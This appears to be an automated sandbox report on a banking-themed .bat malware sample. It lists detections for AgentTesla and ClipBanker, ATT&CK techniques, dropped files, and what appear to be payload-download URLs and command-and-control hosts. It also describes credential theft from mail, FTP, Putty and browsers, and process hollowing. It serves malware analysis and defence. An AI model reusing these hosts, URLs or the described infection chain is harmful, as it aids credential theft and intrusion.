                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 13.0.neworigin.exe.d90000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001C.00000002.2693859207.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000000.1512401609.0000000000D92000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1691089667.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.2692159904.0000000003051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 4352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 7572, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 13.0.neworigin.exe.d90000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1691089667.00000000030C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2693859207.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.2692159904.000000000307C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2693859207.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000000.1512401609.0000000000D92000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.2692159904.0000000003084000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1691089667.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.2692159904.0000000003051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 4352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 7572, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting
                      1
                      Valid Accounts
                      121
                      Windows Management Instrumentation
                      1
                      Scripting
                      1
                      DLL Side-Loading
                      21
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      System Time Discovery
                      1
                      Taint Shared Content
                      1
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts11
                      Native API
                      1
                      DLL Side-Loading
                      1
                      Valid Accounts
                      1
                      Deobfuscate/Decode Files or Information
                      21
                      Input Capture
                      1
                      System Network Connections Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Shared Modules
                      1
                      Valid Accounts
                      1
                      Access Token Manipulation
                      3
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      3
                      File and Directory Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Command and Scripting Interpreter
                      1
                      Scheduled Task/Job
                      311
                      Process Injection
                      1
                      Timestomp
                      NTDS47
                      System Information Discovery
                      Distributed Component Object Model21
                      Input Capture
                      2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts1
                      Scheduled Task/Job
                      21
                      Registry Run Keys / Startup Folder
                      1
                      Scheduled Task/Job
                      1
                      DLL Side-Loading
                      LSA Secrets1
                      Query Registry
                      SSH1
                      Clipboard Data
                      123
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
                      Registry Run Keys / Startup Folder
                      311
                      Masquerading
                      Cached Domain Credentials331
                      Security Software Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Valid Accounts
                      DCSync1
                      Process Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Access Token Manipulation
                      Proc Filesystem151
                      Virtualization/Sandbox Evasion
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt151
                      Virtualization/Sandbox Evasion
                      /etc/passwd and /etc/shadow1
                      Application Window Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
                      Process Injection
                      Network Sniffing1
                      System Network Configuration Discovery
                      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1553795 Sample: Ziraat_Bankasi_Swift_Mesaji... Startdate: 11/11/2024 Architecture: WINDOWS Score: 100 105 s82.gocheapweb.com 2->105 107 pywolwnvd.biz 2->107 109 2 other IPs or domains 2->109 161 Found malware configuration 2->161 163 Malicious sample detected (through community Yara rule) 2->163 165 Antivirus detection for dropped file 2->165 167 12 other signatures 2->167 11 cmd.exe 1 2->11         started        13 Wisrysxl.PIF 2->13         started        16 Wisrysxl.PIF 2->16         started        18 2 other processes 2->18 signatures3 process4 signatures5 20 x.exe 1 7 11->20         started        25 extrac32.exe 8 11->25         started        27 conhost.exe 11->27         started        177 Antivirus detection for dropped file 13->177 179 Multi AV Scanner detection for dropped file 13->179 181 Machine Learning detection for dropped file 13->181 29 lxsyrsiW.pif 13->29         started        183 Writes to foreign memory regions 16->183 185 Allocates memory in foreign processes 16->185 187 Sample uses process hollowing technique 16->187 31 lxsyrsiW.pif 16->31         started        process6 dnsIp7 111 gxe0.com 198.252.105.91, 443, 49705, 49706 HAWKHOSTCA Canada 20->111 97 C:\Users\Public\Libraries\lxsyrsiW.pif, PE32 20->97 dropped 99 C:\Users\Public\Wisrysxl.url, MS 20->99 dropped 101 C:\Users\Public\Libraries\Wisrysxl, data 20->101 dropped 169 Antivirus detection for dropped file 20->169 171 Multi AV Scanner detection for dropped file 20->171 173 Machine Learning detection for dropped file 20->173 175 5 other signatures 20->175 33 lxsyrsiW.pif 4 20->33         started        37 cmd.exe 1 20->37         started        39 esentutl.exe 2 20->39         started        103 C:\Users\user\AppData\Local\Temp\x.exe, PE32 25->103 dropped 41 neworigin.exe 29->41         started        43 server_BTC.exe 29->43         started        45 neworigin.exe 31->45         started        47 server_BTC.exe 31->47         started        file8 signatures9 process10 file11 83 C:\Users\user\AppData\...\server_BTC.exe, PE32 33->83 dropped 85 C:\Users\user\AppData\Local\...\neworigin.exe, PE32 33->85 dropped 87 C:\Program Files (x86)\...\armsvc.exe, PE32 33->87 dropped 125 Drops executable to a common third party application directory 33->125 127 Infects executable files (exe, dll, sys, html) 33->127 49 server_BTC.exe 7 33->49         started        53 neworigin.exe 15 2 33->53         started        56 esentutl.exe 2 37->56         started        58 esentutl.exe 2 37->58         started        60 conhost.exe 37->60         started        89 C:\Users\Public\Libraries\Wisrysxl.PIF, PE32 39->89 dropped 62 conhost.exe 39->62         started        129 Installs a global keyboard hook 41->129 131 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 45->131 133 Tries to steal Mail credentials (via file / registry access) 45->133 135 Tries to harvest and steal ftp login credentials 45->135 137 Tries to harvest and steal browser information (history, passwords, etc) 45->137 signatures12 process13 dnsIp14 91 C:\Users\user\AppData\...\TrojanAIbot.exe, PE32 49->91 dropped 139 Antivirus detection for dropped file 49->139 141 Multi AV Scanner detection for dropped file 49->141 143 Machine Learning detection for dropped file 49->143 157 2 other signatures 49->157 64 TrojanAIbot.exe 49->64         started        67 powershell.exe 49->67         started        69 cmd.exe 49->69         started        71 schtasks.exe 49->71         started        113 s82.gocheapweb.com 51.195.88.199, 49708, 49714, 49716 OVHFR France 53->113 115 api.ipify.org 104.26.12.205, 443, 49707, 49715 CLOUDFLARENETUS United States 53->115 145 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 53->145 147 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 53->147 149 Tries to steal Mail credentials (via file / registry access) 53->149 159 2 other signatures 53->159 93 C:\Users\Public\alpha.pif, PE32 56->93 dropped 151 Drops PE files to the user root directory 56->151 153 Drops PE files with a suspicious file extension 56->153 155 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 56->155 95 C:\Users\Public\xpha.pif, PE32 58->95 dropped file15 signatures16 process17 signatures18 117 Antivirus detection for dropped file 64->117 119 Multi AV Scanner detection for dropped file 64->119 121 Machine Learning detection for dropped file 64->121 123 Loading BitLocker PowerShell Module 67->123 73 conhost.exe 67->73         started        75 WmiPrvSE.exe 67->75         started        77 conhost.exe 69->77         started        79 timeout.exe 69->79         started        81 conhost.exe 71->81         started        process19

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat24%ReversingLabsWin32.Trojan.Malcab
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\server_BTC.exe100%AviraHEUR/AGEN.1311721
                      C:\Users\user\AppData\Local\Temp\neworigin.exe100%AviraTR/Spy.Gen8
                      C:\Users\Public\Libraries\Wisrysxl.PIF100%AviraHEUR/AGEN.1326052
                      C:\Users\user\AppData\Local\Temp\x.exe100%AviraHEUR/AGEN.1326052
                      C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe100%AviraHEUR/AGEN.1311721
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                      C:\Users\user\AppData\Local\Temp\server_BTC.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\neworigin.exe100%Joe Sandbox ML
                      C:\Users\Public\Libraries\Wisrysxl.PIF100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\x.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                      C:\Users\Public\Libraries\Wisrysxl.PIF24%ReversingLabsWin32.Trojan.Generic
                      C:\Users\Public\Libraries\lxsyrsiW.pif3%ReversingLabs
                      C:\Users\Public\alpha.pif0%ReversingLabs
                      C:\Users\Public\xpha.pif0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\neworigin.exe88%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\user\AppData\Local\Temp\server_BTC.exe66%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                      C:\Users\user\AppData\Local\Temp\x.exe24%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe66%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://gxe0.com/yak/233_Wisrysxlfss0%Avira URL Cloudsafe
                      https://gxe0.com/0%Avira URL Cloudsafe
                      https://gxe0.com/yak/233_Wisrysxlfssb0%Avira URL Cloudsafe
                      https://gxe0.com:443/yak/233_Wisrysxlfss0%Avira URL Cloudsafe
                      https://gxe0.com/yak/233_Wisrysxlfsst0%Avira URL Cloudsafe
                      https://gxe0.com/yak/233_Wisrysx0%Avira URL Cloudsafe
                      http://s82.gocheapweb.com0%Avira URL Cloudsafe
                      https://gxe0.com/yak/233_WisrysxlfssV;0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      gxe0.com
                      198.252.105.91
                      truefalse
                        high
                        api.ipify.org
                        104.26.12.205
                        truefalse
                          high
                          s82.gocheapweb.com
                          51.195.88.199
                          truetrue
                            unknown
                            pywolwnvd.biz
                            54.244.188.177
                            truefalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://api.ipify.org/false
                                high
                                https://gxe0.com/yak/233_Wisrysxlfsstrue
                                • Avira URL Cloud: safe
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpfalse
                                  high
                                  http://nuget.org/NuGet.exepowershell.exe, 0000000F.00000002.1626082872.0000000005F49000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://gxe0.com/yak/233_Wisrysxx.exe, 00000004.00000002.1526389874.00000000207ED000.00000004.00001000.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://sectigo.com/CPS0x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpfalse
                                      high
                                      https://account.dyn.com/neworigin.exe, 0000000D.00000000.1512401609.0000000000D92000.00000002.00000001.01000000.00000009.sdmpfalse
                                        high
                                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpfalse
                                          high
                                          http://ocsp.sectigo.com0x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpfalse
                                            high
                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000F.00000002.1600643610.0000000005035000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://r11.o.lencr.org0#neworigin.exe, 0000000D.00000002.1663428780.0000000001485000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003261000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1663428780.0000000001464000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.00000000068CC000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.000000000688E000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2731631118.00000000065BA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.000000000110E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000F.00000002.1600643610.0000000005035000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000F.00000002.1600643610.0000000005035000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contoso.com/Licensepowershell.exe, 0000000F.00000002.1626082872.0000000005F49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://contoso.com/Iconpowershell.exe, 0000000F.00000002.1626082872.0000000005F49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            high
                                                            https://api.ipify.org/tneworigin.exe, 0000000D.00000002.1691089667.0000000003051000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://github.com/Pester/Pesterpowershell.exe, 0000000F.00000002.1600643610.0000000005035000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://gxe0.com/x.exe, 00000004.00000002.1509390491.00000000005F0000.00000004.00000020.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://r11.i.lencr.org/0neworigin.exe, 0000000D.00000002.1663428780.0000000001485000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003261000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1663428780.0000000001464000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.00000000068CC000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.000000000688E000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2731631118.00000000065BA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.000000000110E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://api.ipify.orgneworigin.exe, 0000000D.00000000.1512401609.0000000000D92000.00000002.00000001.01000000.00000009.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003051000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://gxe0.com/yak/233_Wisrysxlfssbx.exe, 00000004.00000002.1509390491.00000000005BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://aka.ms/pscore6lBpowershell.exe, 0000000F.00000002.1600643610.0000000004EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://x1.c.lencr.org/0neworigin.exe, 0000000D.00000002.1663428780.0000000001485000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003261000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1663428780.0000000001464000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.00000000068CC000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2731631118.00000000065BA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.000000000110E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://x1.i.lencr.org/0neworigin.exe, 0000000D.00000002.1663428780.0000000001485000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003261000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1663428780.0000000001464000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1736152536.00000000068CC000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2731631118.00000000065BA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2685889113.000000000110E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000F.00000002.1600643610.0000000005035000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://contoso.com/powershell.exe, 0000000F.00000002.1626082872.0000000005F49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://nuget.org/nuget.exepowershell.exe, 0000000F.00000002.1626082872.0000000005F49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://s82.gocheapweb.comneworigin.exe, 0000000D.00000002.1691089667.00000000030C9000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1691089667.0000000003261000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://gxe0.com:443/yak/233_Wisrysxlfssx.exe, 00000004.00000002.1509390491.0000000000631000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://gxe0.com/yak/233_Wisrysxlfsstx.exe, 00000004.00000002.1509390491.00000000005BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://gxe0.com/yak/233_WisrysxlfssV;x.exe, 00000004.00000002.1509390491.00000000005F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameneworigin.exe, 0000000D.00000002.1691089667.0000000003051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1600643610.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001C.00000002.2693859207.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.pmail.comx.exe, x.exe, 00000004.00000002.1534436929.0000000021DEF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1506456469.0000000000686000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1534105002.0000000021BF0000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1443906217.000000000287C000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1510941907.000000000287E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.00000000206E3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.0000000020764000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1540551626.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1444132666.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000000C.00000000.1506872662.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 0000001A.00000002.1660368294.0000000002B12000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001B.00000000.1636599259.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 0000001E.00000002.1742914385.0000000002B52000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://ocsp.sectigo.com0Cx.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      104.26.12.205
                                                                                      api.ipify.orgUnited States
                                                                                      13335CLOUDFLARENETUSfalse
                                                                                      198.252.105.91
                                                                                      gxe0.comCanada
                                                                                      20068HAWKHOSTCAfalse
                                                                                      51.195.88.199
                                                                                      s82.gocheapweb.comFrance
                                                                                      16276OVHFRtrue
                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1553795
                                                                                      Start date and time:2024-11-11 18:01:26 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 11m 30s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:38
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat
